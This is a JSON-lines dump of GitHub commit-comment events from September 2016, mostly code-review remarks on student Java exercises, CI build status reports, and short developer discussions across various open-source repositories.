{"id":"4637449660","type":"CommitCommentEvent","actor":{"login":"rphmeier"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":19224281,"position":88,"line":88,"path":"ethcore/src/migrations/account_bloom.rs","commit_id":"4d115987cb805f287b48f40ccbfceb476bf6e80e","created_at":"2016-09-29T14:05:18Z","updated_at":"2016-09-29T14:05:18Z","body":"progress indicator here would be helpful (#2404)"}},"created_at":"2016-09-29T14:05:18Z"}
{"id":"4637451641","type":"CommitCommentEvent","actor":{"login":"iocanel"},"repo":{"name":"arquillian/arquillian-cube"},"payload":{"comment":{"id":19224287,"position":19,"line":59,"path":"kubernetes/kubernetes/src/main/java/org/arquillian/cube/kubernetes/impl/DefaultConfiguration.java","commit_id":"5bd0893bc336a363efa3899492c988738f7da49a","created_at":"2016-09-29T14:05:36Z","updated_at":"2016-09-29T14:05:36Z","body":"smart :-)"}},"created_at":"2016-09-29T14:05:36Z"}
{"id":"4637454611","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19224291,"position":25,"line":23,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"97ba35fc2dd260c7adefe91c8e10e8d947a03c61","created_at":"2016-09-29T14:06:04Z","updated_at":"2016-09-29T14:06:04Z","body":"Não, posso retirar."}},"created_at":"2016-09-29T14:06:04Z"}
{"id":"4637454731","type":"CommitCommentEvent","actor":{"login":"redox"},"repo":{"name":"algolia/autocomplete.js"},"payload":{"comment":{"id":19224292,"position":null,"line":null,"path":null,"commit_id":"47c1731c27bbd78bce4f35cd66ab35ccdb43f0bf","created_at":"2016-09-29T14:06:06Z","updated_at":"2016-09-29T14:06:06Z","body":"Arg... Time to give another try to `npm-zepto`?"}},"created_at":"2016-09-29T14:06:06Z"}
{"id":"4637454788","type":"CommitCommentEvent","actor":{"login":"hyanying"},"repo":{"name":"TechLadies/mutts-rescue"},"payload":{"comment":{"id":19224294,"position":192,"line":192,"path":"app/views/home/home.html.erb","commit_id":"7597e46de76f145a177717af5b2eada7c4716386","created_at":"2016-09-29T14:06:06Z","updated_at":"2016-09-29T14:06:06Z","body":"Line 192: This div does not have a corresponding closed bracket below."}},"created_at":"2016-09-29T14:06:06Z"}
{"id":"4637456518","type":"CommitCommentEvent","actor":{"login":"rphmeier"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":19224296,"position":33,"line":33,"path":"ethcore/src/migrations/v10.rs","commit_id":"4d115987cb805f287b48f40ccbfceb476bf6e80e","created_at":"2016-09-29T14:06:22Z","updated_at":"2016-09-29T14:06:22Z","body":"and also here"}},"created_at":"2016-09-29T14:06:22Z"}
{"id":"4637456676","type":"CommitCommentEvent","actor":{"login":"vvo"},"repo":{"name":"algolia/autocomplete.js"},"payload":{"comment":{"id":19224297,"position":null,"line":null,"path":null,"commit_id":"47c1731c27bbd78bce4f35cd66ab35ccdb43f0bf","created_at":"2016-09-29T14:06:23Z","updated_at":"2016-09-29T14:06:23Z","body":"Will see yes"}},"created_at":"2016-09-29T14:06:23Z"}
{"id":"4637457757","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19224299,"position":null,"line":null,"path":null,"commit_id":"b4d70b954f6844a176dbbd549335c3a5578e93cd","created_at":"2016-09-29T14:06:34Z","updated_at":"2016-09-29T14:06:34Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.273.b4d70b954f6844a176dbbd549335c3a5578e93cd](http://build.palaso.org/viewLog.html?buildId=77217&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Execution timeout (new) Build time: 00:35:27"}},"created_at":"2016-09-29T14:06:34Z"}
{"id":"4637458914","type":"CommitCommentEvent","actor":{"login":"redox"},"repo":{"name":"algolia/autocomplete.js"},"payload":{"comment":{"id":19224305,"position":null,"line":null,"path":null,"commit_id":"47c1731c27bbd78bce4f35cd66ab35ccdb43f0bf","created_at":"2016-09-29T14:06:46Z","updated_at":"2016-09-29T14:06:46Z","body":"Or maybe we should make sure docsearch doesn't need to require Zepto?"}},"created_at":"2016-09-29T14:06:46Z"}
{"id":"4637459195","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"rafasilva192/crescer-2016-2"},"payload":{"comment":{"id":19224306,"position":13,"line":13,"path":"Bluej projeto Modulo 1/Dwarf.java","commit_id":"f3ae5fd71e5f0344f826d159782decd8ad607bc5","created_at":"2016-09-29T14:06:49Z","updated_at":"2016-09-29T14:06:49Z","body":"Cuidado, leia atentamente o que o exercício pede: https://gist.github.com/bernardobrezende/1634e83d956624d5df0ed3e92f2adcc6#35"}},"created_at":"2016-09-29T14:06:49Z"}
{"id":"4637459646","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.z3cform"},"payload":{"comment":{"id":19224307,"position":null,"line":null,"path":null,"commit_id":"bb403e0e3639317c5e6b5a12bad8f4d9ffae6626","created_at":"2016-09-29T14:06:53Z","updated_at":"2016-09-29T14:06:53Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.z3cform/47/violations\n```\nplone/app/z3cform/inline_validation.py:15:1: C901 'InlineValidationView.__call__' is too complex (15)\nplone/app/z3cform/tests/test_utils.py:21:9: E731 do not assign a lambda expression, use a def\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-29T14:06:53Z"}
{"id":"4637461659","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"rafasilva192/crescer-2016-2"},"payload":{"comment":{"id":19224312,"position":20,"line":20,"path":"Bluej projeto Modulo 1/Dwarf.java","commit_id":"f3ae5fd71e5f0344f826d159782decd8ad607bc5","created_at":"2016-09-29T14:07:14Z","updated_at":"2016-09-29T14:07:14Z","body":"Pode reduzir para:\r\n\r\n```Java\r\nif (dataNascimento.ehBissexto())\r\n```"}},"created_at":"2016-09-29T14:07:14Z"}
{"id":"4637461721","type":"CommitCommentEvent","actor":{"login":"cassiofariasmachado"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19224313,"position":37,"line":50,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"8c96b26fd28cdef59b89f8516697cb40ca4761e9","created_at":"2016-09-29T14:07:15Z","updated_at":"2016-09-29T14:07:15Z","body":"Acho que agora entendi, a regra de um Dwarf perder vida vai ficar toda na classe Dwarf."}},"created_at":"2016-09-29T14:07:15Z"}
{"id":"4637462133","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19224314,"position":46,"line":43,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"97ba35fc2dd260c7adefe91c8e10e8d947a03c61","created_at":"2016-09-29T14:07:18Z","updated_at":"2016-09-29T14:07:18Z","body":"Tenho por costume fazer validação de campos obrigatórios. Retirar ?"}},"created_at":"2016-09-29T14:07:18Z"}
{"id":"4637464154","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"rafasilva192/crescer-2016-2"},"payload":{"comment":{"id":19224318,"position":22,"line":22,"path":"Bluej projeto Modulo 1/Dwarf.java","commit_id":"f3ae5fd71e5f0344f826d159782decd8ad607bc5","created_at":"2016-09-29T14:07:38Z","updated_at":"2016-09-29T14:07:38Z","body":"Esses dois ifs podem virar um apenas:\r\n\r\n```if (80 <= vida && vida <= 90)```"}},"created_at":"2016-09-29T14:07:38Z"}
{"id":"4637465895","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19224326,"position":null,"line":null,"path":null,"commit_id":"5cc4f1aaab6b833ca14c0d5c3eb759ee29242887","created_at":"2016-09-29T14:07:55Z","updated_at":"2016-09-29T14:07:55Z","body":"Ok, vou fazer mais testes"}},"created_at":"2016-09-29T14:07:55Z"}
{"id":"4637466559","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"rafasilva192/crescer-2016-2"},"payload":{"comment":{"id":19224328,"position":29,"line":29,"path":"Bluej projeto Modulo 1/Dwarf.java","commit_id":"f3ae5fd71e5f0344f826d159782decd8ad607bc5","created_at":"2016-09-29T14:08:02Z","updated_at":"2016-09-29T14:08:02Z","body":"pode fazer tudo na mesma linha:\r\n\r\n```Java\r\nnumeroSorte = numeroSorte * 33 % 100;\r\n```"}},"created_at":"2016-09-29T14:08:02Z"}
{"id":"4637467181","type":"CommitCommentEvent","actor":{"login":"hyanying"},"repo":{"name":"TechLadies/mutts-rescue"},"payload":{"comment":{"id":19224331,"position":150,"line":150,"path":"app/views/home/home.html.erb","commit_id":"7597e46de76f145a177717af5b2eada7c4716386","created_at":"2016-09-29T14:08:08Z","updated_at":"2016-09-29T14:08:08Z","body":"Line 150: This div does not have a corresponding closed bracket below."}},"created_at":"2016-09-29T14:08:08Z"}
{"id":"4637470119","type":"CommitCommentEvent","actor":{"login":"Legga44"},"repo":{"name":"Legga44/Test12"},"payload":{"comment":{"id":19224337,"position":null,"line":null,"path":null,"commit_id":"0dfc13733aa668432402bbc3d580213439cf0d0d","created_at":"2016-09-29T14:08:36Z","updated_at":"2016-09-29T14:08:36Z","body":"change 1"}},"created_at":"2016-09-29T14:08:36Z"}
{"id":"4637470696","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19224338,"position":null,"line":null,"path":null,"commit_id":"79a7a35ab5dfb82c66a8849751c8324d49402d87","created_at":"2016-09-29T14:08:42Z","updated_at":"2016-09-29T14:08:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1195](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14553&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T14:08:42Z"}
{"id":"4637471089","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"rafasilva192/crescer-2016-2"},"payload":{"comment":{"id":19224339,"position":40,"line":40,"path":"Bluej projeto Modulo 1/Dwarf.java","commit_id":"f3ae5fd71e5f0344f826d159782decd8ad607bc5","created_at":"2016-09-29T14:08:45Z","updated_at":"2016-09-29T14:08:45Z","body":"cuidado, deixando este método público quebra a segurança dos dados do `Dwarf`.. a qualquer momento que chamarmos esse método estaremos aumentando a experiência do `Dwarf`.. e não é o que queremos."}},"created_at":"2016-09-29T14:08:45Z"}
{"id":"4637475156","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/Objectively"},"payload":{"comment":{"id":19224346,"position":null,"line":null,"path":null,"commit_id":"1106e23b3869a4a295307516d6e8d2a7af21ec82","created_at":"2016-09-29T14:09:24Z","updated_at":"2016-09-29T14:09:24Z","body":"💯 "}},"created_at":"2016-09-29T14:09:24Z"}
{"id":"4637477550","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19224352,"position":1,"line":1,"path":"app/views/mailer/invite.html.erb","commit_id":"c97bc63d80ffe72bd9e29099a3bcfd7fd32b393c","created_at":"2016-09-29T14:09:45Z","updated_at":"2016-09-29T14:09:45Z","body":"por qué no ocupar `.slim`? :wat:"}},"created_at":"2016-09-29T14:09:45Z"}
{"id":"4637477563","type":"CommitCommentEvent","actor":{"login":"andytimes"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19224351,"position":null,"line":null,"path":null,"commit_id":"a3548e8959ba02bc66e4aa81e4708da7b425f4aa","created_at":"2016-09-29T14:09:45Z","updated_at":"2016-09-29T14:09:45Z","body":"这个只对 Github 的 web 编辑器有效，git 客户端还是要自己改 user.email 配置\n\nUnostvisal <notifications@github.com>于2016年9月29日周四 下午9:59写道：\n\n> [image: image]\n> <https://cloud.githubusercontent.com/assets/16496671/18956952/deca2b82-868f-11e6-8308-ccbafbb619b2.png>\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/racaljk/hosts/commit/a3548e8959ba02bc66e4aa81e4708da7b425f4aa#commitcomment-19224196>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHE34yKaoSg8uZeM3stvvIZXT92TFAmfks5qu8RIgaJpZM4KJ-U4>\n> .\n>\n"}},"created_at":"2016-09-29T14:09:45Z"}
{"id":"4637478367","type":"CommitCommentEvent","actor":{"login":"FrechMax"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19224354,"position":6,"line":67,"path":"tests/de.ovgu.featureide.fm.core-test/src/de/ovgu/featureide/common/Commons.java","commit_id":"185070c08a3867dcaffab99486c52e001e8cdf51","created_at":"2016-09-29T14:09:53Z","updated_at":"2016-09-29T14:09:53Z","body":"Unnötig langer Bezeichner"}},"created_at":"2016-09-29T14:09:53Z"}
{"id":"4637482426","type":"CommitCommentEvent","actor":{"login":"kleetus"},"repo":{"name":"bitpay/bitpay-c-keyutils"},"payload":{"comment":{"id":19224366,"position":null,"line":null,"path":null,"commit_id":"9c9da52b50fc754990670383e4d7a5cb749db97b","created_at":"2016-09-29T14:10:32Z","updated_at":"2016-09-29T14:10:32Z","body":"> But now that it's different you are essentially maintaining two separate C key utils repos\r\n @aleitner\r\n     \r\ncorrect, we are now maintaining two separate repos. One for perl-keyutils and one for C-keyutils and neither are used by our merchants, currently."}},"created_at":"2016-09-29T14:10:32Z"}
{"id":"4637488245","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19224377,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T14:11:31Z","updated_at":"2016-09-29T14:11:31Z","body":"Then update your repo to match cm-14.0 changes and port unified device tree commits on other repos like i did in AOSP"}},"created_at":"2016-09-29T14:11:31Z"}
{"id":"4637491375","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19224387,"position":null,"line":null,"path":null,"commit_id":"6ddc03362135f507d027c57791077997e29fe4b7","created_at":"2016-09-29T14:12:01Z","updated_at":"2016-09-29T14:12:01Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36322/testReport/) for this commit**"}},"created_at":"2016-09-29T14:12:01Z"}
{"id":"4637494987","type":"CommitCommentEvent","actor":{"login":"tritao"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19224392,"position":null,"line":null,"path":null,"commit_id":"28e35bcd683316fca3fc6e6e11d0d086d86cd99d","created_at":"2016-09-29T14:12:37Z","updated_at":"2016-09-29T14:12:37Z","body":"Loving the new architecture 👍 "}},"created_at":"2016-09-29T14:12:37Z"}
{"id":"4637496748","type":"CommitCommentEvent","actor":{"login":"davisking"},"repo":{"name":"mit-nlp/MITIE"},"payload":{"comment":{"id":19224395,"position":12,"line":1044,"path":"mitielib/include/mitie.h","commit_id":"94527f890cdb63f528c882eb698e6bf741c0cb1d","created_at":"2016-09-29T14:12:52Z","updated_at":"2016-09-29T14:12:52Z","body":"A little long :)\r\nYou can just say, a pointer to mitie_total_word_feature_extractor_num_dimensions(twfe_) floats.   Also, the code looks nicer if the variable names are cleaner.  For example, I wouldn't put trailing underscores on twfe."}},"created_at":"2016-09-29T14:12:52Z"}
{"id":"4637497409","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19224397,"position":13,"line":13,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"46a58f0ec5e012fd33ef803b8da010517e7fa11a","created_at":"2016-09-29T14:12:59Z","updated_at":"2016-09-29T14:12:59Z","body":"Não precisa de tantos (), dá pra deixar mais legível:\r\n\r\n```Java\r\nreturn (this.ano % 4 == 0 && this.ano % 100 != 100) || this.ano % 400 == 0;\r\n```"}},"created_at":"2016-09-29T14:12:59Z"}
{"id":"4637499355","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19224403,"position":13,"line":13,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"46a58f0ec5e012fd33ef803b8da010517e7fa11a","created_at":"2016-09-29T14:13:17Z","updated_at":"2016-09-29T14:13:17Z","body":"curiosidade.. pq `this.ano % 100 != 100`?"}},"created_at":"2016-09-29T14:13:17Z"}
{"id":"4637500220","type":"CommitCommentEvent","actor":{"login":"rhcarvalho"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19224406,"position":128,"line":128,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T14:13:25Z","updated_at":"2016-09-29T14:13:25Z","body":"The subject is \"one of the pods\", so I think it stays in singular to match \"one\" -> \"it was\"."}},"created_at":"2016-09-29T14:13:25Z"}
{"id":"4637500401","type":"CommitCommentEvent","actor":{"login":"JesyGrafics"},"repo":{"name":"eppisapia/pas-restaurant-react-native"},"payload":{"comment":{"id":19224407,"position":null,"line":null,"path":null,"commit_id":"8b7fa2a04c70a3b22f477d8b95012c869a1ea7ea","created_at":"2016-09-29T14:13:27Z","updated_at":"2016-09-29T14:13:27Z","body":"Se realizó la revisión de Diseño, la cual arrojó ciertos cambios:\r\n\r\n- Modificar el hover de los tabs del menú ppal (se le pasaran los recursos).\r\n- Agrandar los paddings internos en los cuadros de la ubicación.\r\n- Modificar el splash de acuerdo a todos los tamaños de los dispositivos a usar (pasarle los recursos nuevos).\r\n- Cuando se hiciera select hacer visible un hover en amarillo a los fondos de los textos en la pantalla de contacto.\r\n- Centrar y poner en mayúscula los títulos de las pantallas."}},"created_at":"2016-09-29T14:13:27Z"}
{"id":"4637504485","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19224420,"position":null,"line":null,"path":null,"commit_id":"7e9b228122a4f79f4fbb773b8aaaf43ade742010","created_at":"2016-09-29T14:14:07Z","updated_at":"2016-09-29T14:14:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1194](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14548&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:11:30"}},"created_at":"2016-09-29T14:14:07Z"}
{"id":"4637506946","type":"CommitCommentEvent","actor":{"login":"JesyGrafics"},"repo":{"name":"eppisapia/pas-restaurant-react-native"},"payload":{"comment":{"id":19224427,"position":null,"line":null,"path":null,"commit_id":"8b7fa2a04c70a3b22f477d8b95012c869a1ea7ea","created_at":"2016-09-29T14:14:29Z","updated_at":"2016-09-29T14:14:29Z","body":"[Recursos Tabs.zip](https://github.com/eppisapia/pas-restaurant-react-native/files/500863/Recursos.Tabs.zip)\r\n"}},"created_at":"2016-09-29T14:14:29Z"}
{"id":"4637507262","type":"CommitCommentEvent","actor":{"login":"andytimes"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19224428,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-29T14:14:30Z","updated_at":"2016-09-29T14:14:30Z","body":"不太清楚，只有访问错误网址会被劫持，也不是很影响使用，我配置下路由器后，\r\n基本不会劫持了。\r\n\r\nAndy\r\n\r\nUnostvisal <notifications@github.com>于2016年9月29日周四 下午9:57写道：\r\n\r\n> 还有弹窗广告什么的 我发现其实可以打电话去给ISP靠北 这样的话他们会收敛\r\n>\r\n> —\r\n> You are receiving this because you were mentioned.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/racaljk/hosts/commit/026d52fab9728f311b8edabaf8a4b598d207f5a7#commitcomment-19224160>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AHE346FyDUR-PhUTXPViXwstqM-ZANybks5qu8PFgaJpZM4KJ1wK>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-29T14:14:30Z"}
{"id":"4637508589","type":"CommitCommentEvent","actor":{"login":"lgebhardt"},"repo":{"name":"jmaziarz/peeps"},"payload":{"comment":{"id":19224429,"position":19,"line":19,"path":"spec/requests/contacts_spec.rb","commit_id":"a0ea30d7570c85f0531afc7c5b173df9ee79be83","created_at":"2016-09-29T14:14:43Z","updated_at":"2016-09-29T14:14:43Z","body":"The attributes `name_first` and `name-last` should be hyphenated to match the key format set by default. By turning on the configuration option `config.raise_if_parameters_not_allowed` you are essentially ignoring the parameters and they won't be updated (but should show as a warning in the meta data)."}},"created_at":"2016-09-29T14:14:43Z"}
{"id":"4637517312","type":"CommitCommentEvent","actor":{"login":"mosampaio"},"repo":{"name":"TwilioDevEd/warm-transfer-flask"},"payload":{"comment":{"id":19224450,"position":null,"line":null,"path":null,"commit_id":"c7d0b22c3c700bc8f095dc1f0f7f73c3246efb58","created_at":"2016-09-29T14:16:02Z","updated_at":"2016-09-29T14:16:02Z","body":"done"}},"created_at":"2016-09-29T14:16:02Z"}
{"id":"4637518823","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19224455,"position":4,"line":12,"path":"config/routes.rb","commit_id":"c97bc63d80ffe72bd9e29099a3bcfd7fd32b393c","created_at":"2016-09-29T14:16:15Z","updated_at":"2016-09-29T14:16:15Z","body":"`only: :create`\r\n\r\ny qué tal si le ponemos algo como `resource :refer, only: :create`\r\n\r\nte dejé un comentario en la historia también.. Si solamente son los customers los que van a recomendar (sólo a ellos les sirven los $10) mejor dentro del namespace `:customer`"}},"created_at":"2016-09-29T14:16:15Z"}
{"id":"4637520833","type":"CommitCommentEvent","actor":{"login":"FrechMax"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19224460,"position":null,"line":null,"path":null,"commit_id":"30542bc61bc6aded3876394d3e485242698dbcf7","created_at":"2016-09-29T14:16:32Z","updated_at":"2016-09-29T14:16:32Z","body":"description added :+1: "}},"created_at":"2016-09-29T14:16:32Z"}
{"id":"4637521393","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224465,"position":7,"line":187,"path":"editor/js/main.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:16:36Z","updated_at":"2016-09-29T14:16:36Z","body":"plz change all 'Numerals' to 'numerals'"}},"created_at":"2016-09-29T14:16:36Z"}
{"id":"4637521442","type":"CommitCommentEvent","actor":{"login":"thorsteneckel"},"repo":{"name":"OTRS/otrs"},"payload":{"comment":{"id":19224466,"position":null,"line":null,"path":null,"commit_id":"619bd7d3c9f17096368d61c1b9267aa75870efff","created_at":"2016-09-29T14:16:37Z","updated_at":"2016-09-29T14:16:37Z","body":"++ kudos!"}},"created_at":"2016-09-29T14:16:37Z"}
{"id":"4637523207","type":"CommitCommentEvent","actor":{"login":"rhcarvalho"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19224471,"position":135,"line":135,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T14:16:53Z","updated_at":"2016-09-29T14:16:53Z","body":"Removing members is not a common operation and it has corner cases. Let's get the main flow working first, then we can investigate that and update the docs accordingly."}},"created_at":"2016-09-29T14:16:53Z"}
{"id":"4637523286","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19224470,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-29T14:16:53Z","updated_at":"2016-09-29T14:16:53Z","body":"换DNS保平安 人在做天在看"}},"created_at":"2016-09-29T14:16:53Z"}
{"id":"4637523662","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19224473,"position":6,"line":6,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEraTest.java","commit_id":"46a58f0ec5e012fd33ef803b8da010517e7fa11a","created_at":"2016-09-29T14:16:57Z","updated_at":"2016-09-29T14:16:57Z","body":"Tem poucos testes. Escreva mais alguns cenários (1900, 2000, 2016, 2100)"}},"created_at":"2016-09-29T14:16:57Z"}
{"id":"4637523774","type":"CommitCommentEvent","actor":{"login":"Chronophobe"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19224474,"position":33,"line":33,"path":"Week4/ahmed/Exercise2.hs","commit_id":"fd4dcaf0ec381be31b427301c26a294d10e6e938","created_at":"2016-09-29T14:16:58Z","updated_at":"2016-09-29T14:16:58Z","body":"`s <- [getRandomInt]` means you \"unpack\" the value of the list monad. I believe that in the case of a singleton, it means you just get the single value.\r\n\r\nNow think about the type of `getRandomInt`, it's an integer value wrapped inside the IO Monad. So you actually want to unpack that monad. \r\n\r\nThen finally, you `return (Set s)`.\r\nLet's assume you successfully unpacked the integer value `s` from the IO monad. Then `return` wraps whatever value you supply it back into an IO monad. That's perfectly fine, but the constructor `Set` expects a list value. We determined that `s` is an integer value, so not a list. \r\n\r\nSo, not to change much from this implementation. Can you figure out what the code should look like here? (I know you made another implementation in lines 22-30. But for your understanding it might help to check if you can make sense of the mistakes here. :)"}},"created_at":"2016-09-29T14:16:58Z"}
{"id":"4637524088","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19224475,"position":128,"line":128,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T14:17:01Z","updated_at":"2016-09-29T14:17:01Z","body":"Indeed."}},"created_at":"2016-09-29T14:17:01Z"}
{"id":"4637530303","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19224490,"position":28,"line":27,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"46a58f0ec5e012fd33ef803b8da010517e7fa11a","created_at":"2016-09-29T14:18:00Z","updated_at":"2016-09-29T14:18:00Z","body":"não precisa dos ()"}},"created_at":"2016-09-29T14:18:00Z"}
{"id":"4637531255","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19224494,"position":29,"line":28,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"46a58f0ec5e012fd33ef803b8da010517e7fa11a","created_at":"2016-09-29T14:18:09Z","updated_at":"2016-09-29T14:18:09Z","body":"não precisa de tantos ()"}},"created_at":"2016-09-29T14:18:09Z"}
{"id":"4637531889","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19224496,"position":30,"line":29,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"46a58f0ec5e012fd33ef803b8da010517e7fa11a","created_at":"2016-09-29T14:18:15Z","updated_at":"2016-09-29T14:18:15Z","body":"não precisa de ()"}},"created_at":"2016-09-29T14:18:15Z"}
{"id":"4637532600","type":"CommitCommentEvent","actor":{"login":"Inventaser"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19224499,"position":null,"line":null,"path":null,"commit_id":"9a6088f53555eef0c6ee97a8714b98dba95d7062","created_at":"2016-09-29T14:18:22Z","updated_at":"2016-09-29T14:18:22Z","body":"FoldOutAction.java: Wenn ihr die Klasse komplett neu schreibt, wären javadoc Kommentare sehr nett."}},"created_at":"2016-09-29T14:18:22Z"}
{"id":"4637533100","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19224500,"position":null,"line":null,"path":null,"commit_id":"52fa7e43df232cb8d01e18cca5b2ccb8e507d055","created_at":"2016-09-29T14:18:27Z","updated_at":"2016-09-29T14:18:27Z","body":"1. OK\r\n2. You want to wrap all Bootstrap classes?"}},"created_at":"2016-09-29T14:18:27Z"}
{"id":"4637534647","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224503,"position":10,"line":100,"path":"editor/js/text/bidi.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:18:41Z","updated_at":"2016-09-29T14:18:41Z","body":"remove this line"}},"created_at":"2016-09-29T14:18:41Z"}
{"id":"4637535021","type":"CommitCommentEvent","actor":{"login":"khotey"},"repo":{"name":"khotey/blog-tutorial-nodejs-react"},"payload":{"comment":{"id":19224505,"position":null,"line":null,"path":null,"commit_id":"ac79c4e6f8e4d4704a521a28d85699a85e6959f6","created_at":"2016-09-29T14:18:45Z","updated_at":"2016-09-29T14:18:45Z","body":"Hello, you mast create api route before server main route\r\n```\r\napp.use('/api/methods', (req, res) ...); // server login\r\napp.use('*', (req,res) => { res.render('index.html') } // react app\r\n```"}},"created_at":"2016-09-29T14:18:45Z"}
